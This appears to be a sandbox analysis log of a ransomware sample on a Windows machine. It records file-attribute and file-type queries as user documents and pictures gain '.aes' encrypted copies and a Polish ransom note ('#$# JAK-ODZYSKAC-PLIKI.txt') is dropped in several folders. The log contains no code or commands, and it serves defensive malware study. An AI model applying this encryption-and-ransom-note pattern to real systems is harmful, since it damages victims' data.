| Get Info | C:\Users\kFT6uTQW\Favorites\Links | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Favorites\Microsoft Websites | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Favorites\MSN Websites | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Favorites\Windows Live | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\SzJbmK.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\SzJbmK.odt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\SzJbmK.odt.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\TWIwOWOOuJkW1 zw.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\TWIwOWOOuJkW1 zw.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\TWIwOWOOuJkW1 zw.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\Documents | type = file_attributes |
|
3 | |
| Get Info | C:\Users\Public\Documents\My Music | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Public\Documents\My Pictures | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Public\Documents\My Videos | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Public\Pictures | type = file_attributes |
|
3 | |
| Get Info | C:\Users\Public\Pictures\Sample Pictures | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\x4gPVtjMaNPIjOUfG-lC.doc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\x4gPVtjMaNPIjOUfG-lC.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\6_UYmFiKKpct\x4gPVtjMaNPIjOUfG-lC.doc.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\Music | type = file_attributes |
|
3 | |
| Get Info | C:\Users\Public\Music\Sample Music | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\0kc5Nr5.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\0kc5Nr5.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\0kc5Nr5.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\Public\Videos | type = file_attributes |
|
3 | |
| Get Info | C:\Users\Public\Videos\Sample Videos | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Public\Desktop | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\9oIEfcy.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\9oIEfcy.csv | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\9oIEfcy.csv.aes | type = file_type |
|
2 | |
| Get Info | C:\ | type = file_attributes |
|
2 | |
| Get Info | C:\$Recycle.Bin | type = file_attributes |
|
1 | |
| Get Info | C:\$Recycle.Bin\S-1-5-21-1534390919-4215197118-2202912847-1000 | type = file_attributes |
|
1 | |
| Get Info | C:\Boot | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\cs-CZ | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\da-DK | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\de-DE | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\el-GR | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\es-ES | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\fi-FI | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\Fonts | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\fr-FR | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\hu-HU | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\it-IT | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\ja-JP | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\ko-KR | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\nb-NO | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\nl-NL | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\pl-PL | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\pt-BR | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\pt-PT | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\ru-RU | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\sv-SE | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\tr-TR | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\zh-CN | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\zh-HK | type = file_attributes |
|
1 | |
| Get Info | C:\Boot\zh-TW | type = file_attributes |
|
1 | |
| Get Info | C:\Documents and Settings | type = file_attributes |
|
1 | |
| Get Info | C:\MSOCache | type = file_attributes |
|
1 | |
| Get Info | C:\PerfLogs | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\Filters | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\da-DK | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\de-DE | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\el-GR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\et-EE | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\osknumpad | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\he-IL | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\it-IT | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\pt-PT | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\ro-RO | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\ru-RU | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\th-TH | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\tr-TR | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\uk-UA | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\ink\zh-TW | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\MSInfo | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\MSInfo\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\OFFICE11 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\OFFICE12 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\Stationery | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\TextConv | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\TextConv\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\Triedit | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\VC | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Microsoft Shared\VGX | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\Services | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Common Files\SpeechEngines | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
5 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\A2yHS.rtf | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\A2yHS.rtf | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\A2yHS.rtf.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\JjJMV9taw3HHVo.ods | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\JjJMV9taw3HHVo.ods | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\JjJMV9taw3HHVo.ods.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\Okb6cH9a4iQrI_jw.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\Okb6cH9a4iQrI_jw.csv | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\Okb6cH9a4iQrI_jw.csv.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\PNXTgcQo4yh5r.odt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\PNXTgcQo4yh5r.odt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\LQ5_4QuMSpXKagF3\PNXTgcQo4yh5r.odt.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\31C8Jf9y_xli.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\31C8Jf9y_xli.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\31C8Jf9y_xli.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\4MQNX-qcbrpg7.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\4MQNX-qcbrpg7.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\4MQNX-qcbrpg7.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
18 | |
| Get Info | C:\Users\kFT6uTQW\Documents\aOniMexN t.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\aOniMexN t.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\aOniMexN t.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\BcAtcIc FCi96Kikr19.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\BcAtcIc FCi96Kikr19.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\BcAtcIc FCi96Kikr19.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\bdVwr.doc | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\bdVwr.doc | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\bdVwr.doc.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\D-4thVUMdh.csv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\D-4thVUMdh.csv | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\D-4thVUMdh.csv.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Ev0YlMk5921.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Ev0YlMk5921.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Ev0YlMk5921.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\FbmlDMOUw-TzOy_UnN7.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\FbmlDMOUw-TzOy_UnN7.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\FbmlDMOUw-TzOy_UnN7.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\gXfWKSuNYtgFj.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\gXfWKSuNYtgFj.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\gXfWKSuNYtgFj.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\HHx-9RKiMuPSNON0eJb.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\HHx-9RKiMuPSNON0eJb.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\HHx-9RKiMuPSNON0eJb.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\lcPTyHQE.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\lcPTyHQE.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\lcPTyHQE.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\m-puIO0ZGGG_DdsrzN.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\m-puIO0ZGGG_DdsrzN.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\m-puIO0ZGGG_DdsrzN.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\nfjvj4.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\nfjvj4.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\nfjvj4.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\q7IKH0zTPGa.pptx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\q7IKH0zTPGa.pptx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\q7IKH0zTPGa.pptx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Qis2t0idI.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Qis2t0idI.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Qis2t0idI.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\RLtENk6-mjNOz-raUF3v.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\RLtENk6-mjNOz-raUF3v.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\RLtENk6-mjNOz-raUF3v.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\u5X9.ppt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\u5X9.ppt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\u5X9.ppt.aes | type = file_type |
|
2 | |
| Get Info | C:\Program Files (x86)\Internet Explorer | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Internet Explorer\en-US | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Internet Explorer\SIGNUP | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Java | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Java\jre7 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Java\jre7\bin | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WffPHgzW1qt5nuBKPq.docx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WffPHgzW1qt5nuBKPq.docx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WffPHgzW1qt5nuBKPq.docx.aes | type = file_type |
|
2 | |
| Get Info | C:\Program Files (x86)\Java\jre7\bin\client | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Zb6u3g7h.xlsx | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Zb6u3g7h.xlsx | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Documents\Zb6u3g7h.xlsx.aes | type = file_type |
|
2 | |
| Get Info | C:\Program Files (x86)\Java\jre7\bin\dtplugin | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Java\jre7\bin\plugin2 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files (x86)\Java\jre7\lib | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\-fs-R5u50BfKvf.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\-fs-R5u50BfKvf.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\-fs-R5u50BfKvf.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\Z3txdNfa.bmp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\Z3txdNfa.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\Z3txdNfa.bmp.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\hGZFj\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\3wLGR0fUmkcND1.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\3wLGR0fUmkcND1.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\3wLGR0fUmkcND1.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\8hsXLmZ5FCCheFKC.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\8hsXLmZ5FCCheFKC.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\8hsXLmZ5FCCheFKC.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\pR 2s.bmp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\pR 2s.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\TmdCgSua1hPeIxp_g-_\pR 2s.bmp.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\2mLpi.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\2mLpi.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\2mLpi.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\JP-9xm1BMM.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\JP-9xm1BMM.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\JP-9xm1BMM.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\M8qmIADbo6Rfghx.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\M8qmIADbo6Rfghx.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\M8qmIADbo6Rfghx.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\_g8EG0.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\_g8EG0.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\joDdd\_g8EG0.gif.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\C7FcN8b.bmp | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\C7FcN8b.bmp | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\C7FcN8b.bmp.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\dhn.png | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\dhn.png | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\dhn.png.aes | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\#$# JAK-ODZYSKAC-PLIKI.txt | type = file_attributes |
|
6 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\HLuFP.gif | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\HLuFP.gif | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\Pictures\e8B06t5z\k-E 1jpgXeyuKG\HLuFP.gif.aes | type = file_type |
|
2 | |
